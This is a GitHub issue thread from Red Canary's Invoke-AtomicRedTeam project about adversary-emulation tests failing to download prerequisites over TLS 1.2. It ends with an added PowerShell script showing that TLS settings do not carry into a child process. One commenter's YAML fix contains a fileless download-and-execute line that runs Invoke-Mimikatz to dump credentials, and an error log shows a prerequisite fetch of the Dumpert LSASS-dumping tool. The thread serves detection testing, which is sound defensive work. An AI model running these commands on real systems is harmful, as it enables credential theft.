redcanaryco / invoke-atomicredteam

Invoke-AtomicRedTeam is a PowerShell module to execute tests as defined in the [atomics folder](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics) of Red Canary's Atomic Red Team project.
MIT License

Add support for TLS 1.2 in PowerShell when getting prereq #34

Closed cnotin closed 4 years ago

cnotin commented 4 years ago

I added it in #30 for when Invoke-WebRequestVerifyHash is used, however many tests simply use Invoke-WebRequest from PowerShell to download their prereq files. GitHub on its github.com now requires TLS 1.2 which prevents download for example:

```
PS C:\windows\system32> Invoke-AtomicTest T1003 -TestNumbers 7 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1003-7 Dump LSASS.exe Memory using direct system calls and API unhooking
Attempting to satisfy prereq: Dumpert executable must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1003\bin\Outflank-Dumpert.exe)
Invoke-WebRequest : The request was aborted: Could not create SSL/TLS secure channel.
At line:2 char:1
+ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Failed to meet prereq: Dumpert executable must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1003\bin\Outflank-Dumpert.exe)
```

I tried adding the following in the .psm1 file, but it doesn't look like it's sufficient:

```powershell
[Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12)
```

Which is normal considering that it seems a child powershell.exe is launched, so it's a different context! I don't know the code very well, so I don't know where it would be best to inject it to ensure it applies to most of the code :)

A short term solution could be using raw.githubusercontent.com links (which still accepts TLS 1.0 and 1.1) instead of https://github.com//Dumpert/raw... but let's do better ;)

cnotin commented 4 years ago

We have the SchUseStrongCrypto registry key, which applies these settings to all .NET apps, but it's under HKLM so it requires admin, and I don't think that's a prerequisite for Invoke-ART, so that might not do the trick...

clr2of8 commented 4 years ago

We've decided to address this by updating the atomics themselves (the yaml files within the other GitHub repo). This way the fix works for any/all execution frameworks. You will see several PRs from Scoubi adding the fix over there. thx

cnotin commented 4 years ago

It works too :)

WinterIsCommin commented 3 years ago

@clr2of8, did he fix the issues? Because I'm going through the same issue now..

cnotin commented 3 years ago

@WinterIsCommin which test in particular?

WinterIsCommin commented 3 years ago

@cnotin Powershell - FileLess - T1059.001, test 1 & 3 for now.

cnotin commented 3 years ago

Indeed, it's missing the necessary code.

WinterIsCommin commented 3 years ago

@cnotin Fixed it by adding the following command before the web request. For example, in file T1059.001.yaml:

```yaml
executor:
  command: |
    powershell.exe "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12" ; "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```

cnotin commented 3 years ago

That's the idea :) Actually this test could be modified to use the "powershell" executor instead of command_prompt to then call powershell.exe

You can submit a PR if you want
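The following PowerShell script is an added example, not code from the repository or from any commenter. It demonstrates the point made in the first comment, that `[Net.ServicePointManager]::SecurityProtocol` is per-process, so a setting in the module never reaches the child powershell.exe that a command_prompt executor launches, and it shows the per-command prefix from the T1059.001.yaml comment that fixes it. The function names are made up for the example; it assumes Windows PowerShell 5.1, where this cmdlet runs on .NET Framework.

```powershell
# Added example (not part of the repository): SecurityProtocol is process-local,
# so a child powershell.exe does not inherit the parent's TLS settings.
# Assumes Windows PowerShell 5.1 (.NET Framework ServicePointManager).

function Enable-Tls12InCurrentProcess {
    # OR in Tls12 so protocols already enabled in this process stay enabled.
    [Net.ServicePointManager]::SecurityProtocol =
        [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12
    return [Net.ServicePointManager]::SecurityProtocol
}

function Get-ChildSecurityProtocol {
    param([string]$Prefix = '')
    # Launch a separate powershell.exe, the way a command_prompt executor does,
    # and ask that child which protocols it would negotiate. $Prefix is any
    # statement to run first (empty = no fix applied).
    $cmd = "$Prefix [Net.ServicePointManager]::SecurityProtocol"
    return (& powershell.exe -NoProfile -NonInteractive -Command $cmd) -join ''
}

# 1. Parent process (the module's own context): enable TLS 1.2.
$parent = Enable-Tls12InCurrentProcess
Write-Host "Parent process : $parent"

# 2. Child without any fix: it reports only the OS/.NET default for a new
#    process, which is where the "Could not create SSL/TLS secure channel"
#    error comes from on hosts whose default does not include Tls12.
$childDefault = Get-ChildSecurityProtocol
Write-Host "Child (no fix) : $childDefault"

# 3. Child with the per-command prefix now placed in the atomics before
#    Invoke-WebRequest / DownloadString: the setting lands in the right process.
$tls12Prefix = '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;'
$childFixed = Get-ChildSecurityProtocol -Prefix $tls12Prefix
Write-Host "Child (fixed)  : $childFixed"

if ($childFixed -notmatch 'Tls12') {
    throw 'TLS 1.2 was not enabled in the child process'
}
```

On a fully patched host the "no fix" child may already list Tls12 (or SystemDefault) because of the SchUseStrongCrypto default mentioned above, in which case only the parent/child difference, not the failure, is visible.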